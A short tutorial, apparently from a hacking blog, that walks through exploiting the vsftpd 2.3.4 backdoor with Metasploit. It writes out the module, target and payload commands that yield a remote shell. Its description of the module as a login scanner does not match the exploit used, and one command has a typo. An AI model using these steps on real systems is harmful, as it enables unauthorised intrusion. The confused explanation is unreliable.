- Ethical Hacking
- Social Media
- Penetration Testing
-
Trending
.Net Interview Level
Programming
Interview Question
- MetaSploit
- Linux
FTP is a service that is commonly used in Web Servers from Webmasters for accessing the files remotely. So it is almost impossible not to find this service in one of our clients systems during an engagement.
The "vsftpd" auxiliary module will scan a range of IP addresses attempting to log in to FTP servers. This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Step 1 : PostgreSQL is available integrated with the package management on most Linux platforms. When available, this is the recommended way to install PostgreSQL, since it provides proper integration with the operating system, including automatic patching and other management functionality.
Step 2 : This is msfconsole. Msfconsole is the main interface to MetaSploit. There are GUI interfaces (armitage), and a web interface too (websploit). With msfconsole, you can launch exploits, create listeners, configure payloads etc.
Step 3 :The current status of the database.
db_status
search vsftpd
Step 4 : Use Vsftpd backdoor.
use exploit/unix/ftp/vsftpd_234_backdoor
Step 5 : Set Target I.P in RHOSTS
ser RHOSTS 192.168.69.131
Step 6 : Use payload and run it.
set payload cmd/unix/interact
run
Step 7 :You have sucessfuly Hack a FTP Server using Kali Linux (vsftpd Vulnerability) !!
Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).
